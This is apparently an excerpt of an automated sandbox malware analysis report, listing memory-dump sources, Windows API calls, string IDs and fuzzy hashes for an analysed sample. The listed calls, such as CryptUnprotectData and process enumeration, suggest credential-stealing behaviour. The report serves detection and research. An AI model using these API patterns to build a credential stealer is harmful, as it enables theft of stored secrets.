                        • Associated: 00000000.00000002.1744810954.0000000000936000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744965147.0000000000AD3000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744983459.0000000000AD4000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_440000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID: 2$z$AGvy$fs![$z"~g$a;}$wvy
                        • API String ID: 0-1479340695
                        • Opcode ID: 09f2118c418a957310edc9fbdee2efb3b69426134bd08dbbab56d72979783bab
                        • Instruction ID: 383f6e72d06759ec22d0edc48d857593ffb5ea5905e1bd3cd460270e9a6ac4f9
                        • Opcode Fuzzy Hash: 09f2118c418a957310edc9fbdee2efb3b69426134bd08dbbab56d72979783bab
                        • Instruction Fuzzy Hash: AFB207F3A082149FD3046E2DEC8567AFBE9EF94320F1A493DEAC5C7744E63598018697
                        APIs
                        • GetProcessHeap.KERNEL32(00000000,00000104,00000000,00000000,?), ref: 00462C42
                        • RtlAllocateHeap.NTDLL(00000000), ref: 00462C49
                        • GetTimeZoneInformation.KERNEL32(?), ref: 00462C58
                        • wsprintfA.USER32 ref: 00462C83
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1742584699.0000000000441000.00000040.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true
                        • Associated: 00000000.00000002.1742468936.0000000000440000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1742584699.0000000000477000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1742584699.00000000004CE000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1742584699.00000000004D6000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1742584699.00000000004EF000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1742584699.0000000000678000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744000662.000000000068A000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744083215.000000000068C000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744083215.0000000000816000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744083215.00000000008F8000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744083215.000000000091F000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744083215.0000000000926000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744083215.0000000000935000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744810954.0000000000936000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744965147.0000000000AD3000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744983459.0000000000AD4000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_440000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Heap$AllocateInformationProcessTimeZonewsprintf
                        • String ID: wwww
                        • API String ID: 3317088062-671953474
                        • Opcode ID: 5fc993e23f1fa07df43abaa798d20472b1e57531e2478d8bc04fd6c4a54a817a
                        • Instruction ID: 200d80aee3614c143d0788576d49af853204f5332086de44b1f33d47dc8f93f3
                        • Opcode Fuzzy Hash: 5fc993e23f1fa07df43abaa798d20472b1e57531e2478d8bc04fd6c4a54a817a
                        • Instruction Fuzzy Hash: 81012BB1A40604ABD71C9F58DC09F6EBB6EEB84721F10432AF91ADB3C0D77819008AE5
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1744083215.000000000068C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true
                        • Associated: 00000000.00000002.1742468936.0000000000440000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1742584699.0000000000441000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1742584699.0000000000477000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1742584699.00000000004CE000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1742584699.00000000004D6000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1742584699.00000000004EF000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1742584699.0000000000678000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744000662.000000000068A000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744083215.0000000000816000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744083215.00000000008F8000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744083215.000000000091F000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744083215.0000000000926000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744083215.0000000000935000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744810954.0000000000936000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744965147.0000000000AD3000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744983459.0000000000AD4000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_440000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID: $%uo$$%uo$1&?n$;'|j$CG~$Mm1_
                        • API String ID: 0-2475217436
                        • Opcode ID: cd27ee949425bee75b3bc4e4381c04a54c318f1a5c74da144356f73792c11335
                        • Instruction ID: 2dd2d8bbc98badbe2f5b86224a6f30557c5f1e1e854379cf99f17e7772e14b78
                        • Opcode Fuzzy Hash: cd27ee949425bee75b3bc4e4381c04a54c318f1a5c74da144356f73792c11335
                        • Instruction Fuzzy Hash: 84423AF3608308AFE3046E2DEC85A7AFBD9EBD4720F1A463DE6C4C7744E93558058696
                        APIs
                        • GetProcessHeap.KERNEL32(00000008,00000400), ref: 0044775E
                        • RtlAllocateHeap.NTDLL(00000000), ref: 00447765
                        • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 0044778D
                        • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000400,00000000,00000000), ref: 004477AD
                        • LocalFree.KERNEL32(?), ref: 004477B7
                        Memory Dump Source
                        • Source File: 00000000.00000002.1742584699.0000000000441000.00000040.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true
                        • Associated: 00000000.00000002.1742468936.0000000000440000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1742584699.0000000000477000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1742584699.00000000004CE000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1742584699.00000000004D6000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1742584699.00000000004EF000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1742584699.0000000000678000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744000662.000000000068A000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744083215.000000000068C000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744083215.0000000000816000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744083215.00000000008F8000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744083215.000000000091F000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744083215.0000000000926000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744083215.0000000000935000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744810954.0000000000936000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744965147.0000000000AD3000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744983459.0000000000AD4000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_440000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Heap$AllocateByteCharCryptDataFreeLocalMultiProcessUnprotectWide
                        • String ID:
                        • API String ID: 2609814428-0
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1744083215.000000000068C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_440000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID: %%Oh$[3W~$m3V$sk
                        • API String ID: 0-3102419359
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1744083215.000000000068C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_440000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID: -?s_$P)8$o ,$:O/
                        • API String ID: 0-22989051
                        APIs
                          • Part of subcall function 004671E0: lstrcpy.KERNEL32(00000000,ERROR), ref: 004671FE
                        • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00463A96
                        • Process32First.KERNEL32(00000000,00000128), ref: 00463AA9
                        • Process32Next.KERNEL32(00000000,00000128), ref: 00463ABF
                          • Part of subcall function 00467310: lstrlen.KERNEL32(------,00445BEB), ref: 0046731B
                          • Part of subcall function 00467310: lstrcpy.KERNEL32(00000000), ref: 0046733F
                          • Part of subcall function 00467310: lstrcat.KERNEL32(?,------), ref: 00467349
                          • Part of subcall function 00467280: lstrcpy.KERNEL32(00000000), ref: 004672AE
                        • CloseHandle.KERNEL32(00000000), ref: 00463BF7
                        Memory Dump Source
                        • Source File: 00000000.00000002.1742584699.0000000000441000.00000040.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_440000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpy$Process32$CloseCreateFirstHandleNextSnapshotToolhelp32lstrcatlstrlen
                        • String ID:
                        • API String ID: 1066202413-0
                        APIs
                        • lstrlen.KERNEL32(?,00000001,?,?,00000000,00000000), ref: 0044EA76
                        • CryptStringToBinaryA.CRYPT32(?,00000000,?,00000001,?,?,00000000), ref: 0044EA7E
                        • lstrcat.KERNEL32(0046CFEC,0046CFEC), ref: 0044EB27
                        • lstrcat.KERNEL32(0046CFEC,0046CFEC), ref: 0044EB49
                        Memory Dump Source
                        • Source File: 00000000.00000002.1742584699.0000000000441000.00000040.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_440000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcat$BinaryCryptStringlstrlen
                        • String ID:
                        • API String ID: 189259977-0
                        APIs
                        • CryptBinaryToStringA.CRYPT32(?,?,40000001,00000000,?,?,?,?,?,?), ref: 004640CD
                        • GetProcessHeap.KERNEL32(00000000,?,?,?), ref: 004640DC
                        • RtlAllocateHeap.NTDLL(00000000), ref: 004640E3
                        • CryptBinaryToStringA.CRYPT32(?,?,40000001,?,?,?,?,?,?), ref: 00464113
                        Memory Dump Source
                        • Source File: 00000000.00000002.1742584699.0000000000441000.00000040.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_440000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: BinaryCryptHeapString$AllocateProcess
                        • String ID:
                        • API String ID: 3825993179-0
                        APIs
                        • GetProcessHeap.KERNEL32(00000000,00000104,00000000,00000000,?,?,00000000,0046A3D0,000000FF), ref: 00462B8F
                        • RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 00462B96
                        • GetLocalTime.KERNEL32(?,?,00000000,0046A3D0,000000FF), ref: 00462BA2
                        • wsprintfA.USER32 ref: 00462BCE
                        Memory Dump Source
                        • Source File: 00000000.00000002.1742584699.0000000000441000.00000040.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_440000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Heap$AllocateLocalProcessTimewsprintf
                        • String ID:
                        • API String ID: 377395780-0
                        APIs
                        • CryptStringToBinaryA.CRYPT32(00000000,00000000,00000001,00000000,?,00000000,00000000), ref: 00449B3B
                        • LocalAlloc.KERNEL32(00000040,00000000), ref: 00449B4A
                        • CryptStringToBinaryA.CRYPT32(00000000,00000000,00000001,00000000,?,00000000,00000000), ref: 00449B61
                        • LocalFree.KERNEL32 ref: 00449B70
                        Memory Dump Source
                        • Source File: 00000000.00000002.1742584699.0000000000441000.00000040.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_440000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: BinaryCryptLocalString$AllocFree
                        • String ID:
                        • API String ID: 4291131564-0
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1744083215.000000000068C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_440000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID: *0X}$5}jq$f@{]
                        • API String ID: 0-3207220155
                        APIs
                        • CoCreateInstance.COMBASE(0046B110,00000000,00000001,0046B100,?), ref: 0045CB06
                        • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,000000FF,?,00000104), ref: 0045CB46
                        • lstrcpyn.KERNEL32(?,?,00000104), ref: 0045CBC9
                        Memory Dump Source
                        • Source File: 00000000.00000002.1742584699.0000000000441000.00000040.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_440000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: ByteCharCreateInstanceMultiWidelstrcpyn
                        • String ID:
                        • API String ID: 1940255200-0
                        • Opcode ID: 094b5d2886eac8adab66d69fd793091fed02e0d60aae09db2a1de0823ab13254
                        • Instruction ID: 371d0b72c50a967dcfb9ee8beca44a3392a4b30b335733912665d0457b950156
                        • Opcode Fuzzy Hash: 094b5d2886eac8adab66d69fd793091fed02e0d60aae09db2a1de0823ab13254
                        • Instruction Fuzzy Hash: 09317571A40715BFD710DB94CC96FAAB7B9DB88B11F104185FA14EB2D0D7B4AE44CBA0
                        APIs
                        • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00449B9F
                        • LocalAlloc.KERNEL32(00000040,?), ref: 00449BB3
                        • LocalFree.KERNEL32(?), ref: 00449BD7
                        Memory Dump Source
                        • Source File: 00000000.00000002.1742584699.0000000000441000.00000040.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_440000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Local$AllocCryptDataFreeUnprotect
                        • String ID:
                        • API String ID: 2068576380-0
                        • Opcode ID: 0238d53d524565ead65740e23dbf5c3bacb93316dc4ff2ff770d008dd82fc06a
                        • Instruction ID: 1d7ffc46a0c90779d469465d4cbd16d148335c45a430bd322f74e219f4fa0b41
                        • Opcode Fuzzy Hash: 0238d53d524565ead65740e23dbf5c3bacb93316dc4ff2ff770d008dd82fc06a
                        • Instruction Fuzzy Hash: A1011DB5A41309ABE710DBA4DC45FABB779EB44B00F104559EA04AB380E7B4AE008BE5
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1744083215.000000000068C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_440000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID: Ay_${S:f
                        • API String ID: 0-1204020038
                        • Opcode ID: eca41531115f3b012fb5e9662755babcbae8c797a90e57ed6e4014998c46532b
                        • Instruction ID: 38b577bfb749a9fcbdfc6b69144a8ac7d0c8923643a5b095b2fa30e42d95fe76
                        • Opcode Fuzzy Hash: eca41531115f3b012fb5e9662755babcbae8c797a90e57ed6e4014998c46532b
                        • Instruction Fuzzy Hash: 4E518CF3A0C1009FE308AE3DDD8627AFBE5EF94220F1A463DEAC5C3744E53599158682
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1744083215.000000000068C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_440000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID: 2z_$ge{}
                        • API String ID: 0-2354384569
                        • Opcode ID: a2c8264cccf9df2d2b67dfb0f0e035d16e04c138d6021731a7fd84f8dd692e3b
                        • Instruction ID: 22eb34e5761c2346ed3f0a467f003b6d78c175baf750512ec1535ec216f01dab
                        • Opcode Fuzzy Hash: a2c8264cccf9df2d2b67dfb0f0e035d16e04c138d6021731a7fd84f8dd692e3b
                        • Instruction Fuzzy Hash: C03179F361D2085FE3186E299C86276B7CAEBD4330F2A873DE694837C4FD3959054286
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1744083215.000000000068C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_440000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID: Ywy
                        • API String ID: 0-26555104
                        • Opcode ID: 8ccb19cd75b9bcb7db5a632d47a39cb820d1c54365cc1a09a4cab700933c35db
                        • Instruction ID: 9d43009b987238fd48e46c2dcda21836b4ea5ddd72b52d3887ab6b544474fa88
                        • Opcode Fuzzy Hash: 8ccb19cd75b9bcb7db5a632d47a39cb820d1c54365cc1a09a4cab700933c35db
                        • Instruction Fuzzy Hash: 0D715BF3A082049FE314AE2AEC447BBBBD5DFD4720F1A893DE78487784E53558418292
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1744083215.000000000068C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_440000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID: Mw+
                        • API String ID: 0-3973434849
                        • Opcode ID: daa4e0b46ea4b68ba951fc1aeb229fc92422008409d6c9357b123d4b42f5d747
                        • Instruction ID: 6d506fac1f8b5fb05d1019059f05cb09ff0a81e45853bd7af39c7f4c9e1da061
                        • Opcode Fuzzy Hash: daa4e0b46ea4b68ba951fc1aeb229fc92422008409d6c9357b123d4b42f5d747
                        • Instruction Fuzzy Hash: 0B5106F3A085149FF700EA2DDC5577ABBD6EB84310F1A853DEAC9C7784E93898158386
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1744083215.000000000068C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_440000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID: Ck=o
                        • API String ID: 0-1535260793
                        • Opcode ID: 45db9e2c719a9dbf4f08030b34739f1b127af4d448f752dee248f6a9ac14eb02
                        • Instruction ID: 40f8387351bbabc789644286de7bcb8101a5d1d6b287c26dde3513d2ea7ee877
                        • Opcode Fuzzy Hash: 45db9e2c719a9dbf4f08030b34739f1b127af4d448f752dee248f6a9ac14eb02
                        • Instruction Fuzzy Hash: 03217DB361C31DDBC28059B8AC809767BD9F7643BCF260629F9A6D73C0F521AC019693
                        Memory Dump Source
                        • Source File: 00000000.00000002.1744083215.000000000091F000.00000040.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_440000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 0717bd8b421789f6c92c642957d3ef3fe26d6c5df6f777476ffaebac4cb997cb
                        • Instruction ID: b5042747e244a052638f0f34af5346ade12060c076cf0447208ec1e21d62ec3d
                        • Opcode Fuzzy Hash: 0717bd8b421789f6c92c642957d3ef3fe26d6c5df6f777476ffaebac4cb997cb
                        • Instruction Fuzzy Hash: 41C16AB3B082049FE7109E1CDC817AAB3D9EF84720F19853DEAC8C7744EA399C458796
                        Memory Dump Source
                        • Source File: 00000000.00000002.1744083215.000000000068C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_440000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 36e7cd6238b26b8d544a0b60080a4e01037fc6d6caddc4e10e594bf6e18b3b46
                        • Instruction ID: e119b4a0b02417a47108a64e0fb85ebda1e18e071ba100cdefd1082a574d9fac
                        • Opcode Fuzzy Hash: 36e7cd6238b26b8d544a0b60080a4e01037fc6d6caddc4e10e594bf6e18b3b46
                        • Instruction Fuzzy Hash: AC513BF3B592005FF300997EEC8577BB6DBDBD4620F2A853AE594C7748E97888024152
                        Memory Dump Source
                        • Source File: 00000000.00000002.1744083215.000000000068C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_440000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 9880f2f06d44d51fe4f7b26d7e0718638a0a55b9ad7e98bbc95e56bba8b160a4
                        • Instruction ID: 34eb75b2a1fb8636d3138874c3254a639482f0b00afe61b0211034b68a88f89d
                        • Opcode Fuzzy Hash: 9880f2f06d44d51fe4f7b26d7e0718638a0a55b9ad7e98bbc95e56bba8b160a4
                        • Instruction Fuzzy Hash: CC51F8F3A0C6145FE3186E69DC8162BF7D9EBA8320F17453EE9C8D3340E5765C008692
                        Memory Dump Source
                        • Source File: 00000000.00000002.1744083215.000000000068C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_440000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 104fa2f1409c4ada48a89ec47866048507319e91d8f7becbcbffcbe36750d2f1
                        • Instruction ID: 125dc0fa0ab650cac2cdd4690cb2a5050acbdaca1d8311091acad7e003daffef
                        • Opcode Fuzzy Hash: 104fa2f1409c4ada48a89ec47866048507319e91d8f7becbcbffcbe36750d2f1
                        • Instruction Fuzzy Hash: B75137F3E082149FF3156929DC547BAB7DAEBD4330F1B853DAA9487784EE3958028285
                        Memory Dump Source
                        • Source File: 00000000.00000002.1744083215.000000000068C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true
                        • Associated: 00000000.00000002.1742468936.0000000000440000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1742584699.0000000000441000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1742584699.0000000000477000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1742584699.00000000004CE000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1742584699.00000000004D6000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1742584699.00000000004EF000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1742584699.0000000000678000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744000662.000000000068A000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744083215.0000000000816000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744083215.00000000008F8000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744083215.000000000091F000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744083215.0000000000926000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744083215.0000000000935000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744810954.0000000000936000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744965147.0000000000AD3000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744983459.0000000000AD4000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_440000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 12a9acbee3fd88cae0095ab1b588acf4dc11efd50eb1186edbc55248b3836478
                        • Instruction ID: 78f73b0cf30302793b375496e649545112804dac6cfc0a101bc74d821ecb57fa
                        • Opcode Fuzzy Hash: 12a9acbee3fd88cae0095ab1b588acf4dc11efd50eb1186edbc55248b3836478
                        • Instruction Fuzzy Hash: 094125F36181009BF348EE29DC857BB77EAEBD4310F1A8A3DD6C1C3784E93999058646
                        Memory Dump Source
                        • Source File: 00000000.00000002.1744083215.0000000000816000.00000040.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true
                        • Associated: 00000000.00000002.1742468936.0000000000440000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1742584699.0000000000441000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1742584699.0000000000477000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1742584699.00000000004CE000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1742584699.00000000004D6000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1742584699.00000000004EF000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1742584699.0000000000678000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744000662.000000000068A000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744083215.000000000068C000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744083215.00000000008F8000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744083215.000000000091F000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744083215.0000000000926000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744083215.0000000000935000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744810954.0000000000936000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744965147.0000000000AD3000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744983459.0000000000AD4000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_440000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: eadde4060911fa0a5dd9f7769dc065d84fc9d20144d59ac63390ffd30418e407
                        • Instruction ID: f1e87391a2a5572dec3e98cf6fbab062139052b337e1de8d87be5fa7b89ed430
                        • Opcode Fuzzy Hash: eadde4060911fa0a5dd9f7769dc065d84fc9d20144d59ac63390ffd30418e407
                        • Instruction Fuzzy Hash: 1B3168B210D314AFD715BF18EC826BAFBE9EF98360F06492DE6C483600D6755880CB97
                        APIs
                        • lstrlen.KERNEL32(00000000), ref: 00458636
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 0045866D
                        • lstrcpy.KERNEL32(?,00000000), ref: 004586AA
                        • StrStrA.SHLWAPI(?,0158E0A0), ref: 004586CF
                        • lstrcpyn.KERNEL32(006793D0,?,00000000), ref: 004586EE
                        • lstrlen.KERNEL32(?), ref: 00458701
                        • wsprintfA.USER32 ref: 00458711
                        • lstrcpy.KERNEL32(?,?), ref: 00458727
                        • StrStrA.SHLWAPI(?,0158E250), ref: 00458754
                        • lstrcpy.KERNEL32(?,006793D0), ref: 004587B4
                        • StrStrA.SHLWAPI(?,0158E010), ref: 004587E1
                        • lstrcpyn.KERNEL32(006793D0,?,00000000), ref: 00458800
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1742584699.0000000000441000.00000040.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true
                        • Associated: 00000000.00000002.1742468936.0000000000440000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1742584699.0000000000477000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1742584699.00000000004CE000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1742584699.00000000004D6000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1742584699.00000000004EF000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1742584699.0000000000678000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744000662.000000000068A000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744083215.000000000068C000.00000040.00000001.01000000.00000003.sdmp
